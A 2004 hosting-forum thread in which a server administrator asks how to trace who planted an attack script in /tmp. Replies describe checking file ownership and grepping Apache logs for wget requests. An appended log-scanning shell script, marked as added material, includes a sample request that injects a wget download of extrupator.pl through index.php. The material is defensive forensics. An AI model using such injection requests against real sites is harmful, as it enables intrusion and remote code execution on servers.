how to track hacker?

Discussion in 'General Discussion' started by 10101, Jun 14, 2004.

  1. 10101

    Hi,

    I keep seeing files like "extrupator.pl" in my tmp folder which are attempts to hack the server.

    I think they are uploaded through a site which has a vulnerable script, but I am not sure what commands to run to catch this little sod.

    What lines should I run to find out who uploaded/ran extrupator.pl?
     
  2. AlexSmithMCP

    You could replace the script with one that logs their IP as well as the hostname it was run through (I think that can be done); that should help you find them :) Make sure it emails it to an off-site email address, though....
     
  3. 10101

    That would be cool. Where would I get such a script?
     
  4. sawbuck

  5. 10101

  6. Ben

    If you are using phpSuExec, then determining the vulnerable site is easy.

    If you aren't, it's harder.

    If you are, run

    ls -la file.pl

    That should tell you the owner of the file.

    Then go to /usr/local/apache/domlogs/ and run

    grep wget `ls | grep username`

    This should then show all instances where attempts to wget a file were logged. This is usually a good indication of a vulnerable script, usually something like

    index.php?x=wget bad file

    What you do with the site from there is up to you.

    If you don't use phpSuExec, then you can run the following. Please note that this command can be load-intensive and take a while to run:

    grep filename.pl *.com

    If there are no results, proceed to other TLDs on your machine, e.g.

    grep filename.pl *.net

    That will show you instances where most likely the file was wget'ed, and can also determine the site. Yet again, what to do with it is up to you.

    HTH,

    Ben
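
The log search from Ben's post above, as an added example that is not part of the original thread: it scans each domlog for requests mentioning wget or the dropped file's name and reports the log file, client IP, timestamp and request line. The function names, the sample log lines, the Apache combined log format and the idea that log file names contain the account name are assumptions.

```shell
#!/bin/sh
# Added example (not from the thread): triage Apache domlogs for requests
# that mention wget or the name of a file dropped in /tmp.

# file_owner FILE -> account that owns FILE (meaningful under phpSuExec,
# where PHP scripts run as the site's own user, not the shared web user).
file_owner() {
    ls -ld -- "$1" | awk '{ print $3 }'
}

# scan_domlogs DIR DROPPED_NAME [ACCOUNT]
# Prints: logfile <TAB> client IP <TAB> timestamp <TAB> request line.
# ACCOUNT, if given, limits the scan to log files whose name contains it
# (assumption: log names contain the account name, as the grep above implies).
scan_domlogs() (
    dir=$1 dropped=$2 account=${3:-}
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        case "${f##*/}" in *"$account"*) ;; *) continue ;; esac
        # Split on double quotes: $1 = 'ip - - [time zone] ', $2 = request.
        awk -F'"' -v OFS='\t' -v src="${f##*/}" -v name="$dropped" '
            { req = tolower($2) }
            index(req, "wget") || index(req, tolower(name)) {
                split($1, pre, " ")
                ts = pre[4]; sub(/^\[/, "", ts)
                print src, pre[1], ts, $2
            }' "$f"
    done
)

# Constructed sample log lines (documentation IP ranges, made-up site names).
write_sample_logs() {
    mkdir -p "$1"
    cat > "$1/shop-alice.example.com" <<'EOF'
192.0.2.10 - - [14/Jun/2004:03:12:45 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120
198.51.100.7 - - [14/Jun/2004:03:14:02 +0000] "GET /index.php?x=wget%20http://files.example.net/extrupator.pl HTTP/1.0" 200 312
EOF
    cat > "$1/blog-bob.example.net" <<'EOF'
203.0.113.5 - - [14/Jun/2004:04:00:00 +0000] "GET /about.html HTTP/1.1" 200 900
EOF
}
```

On a real server the call would be `scan_domlogs /usr/local/apache/domlogs extrupator.pl "$(file_owner /tmp/extrupator.pl)"`; leave the third argument off when phpSuExec is not in use, since the file owner is then the shared web user.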
     
  7. sawbuck

  8. 10101
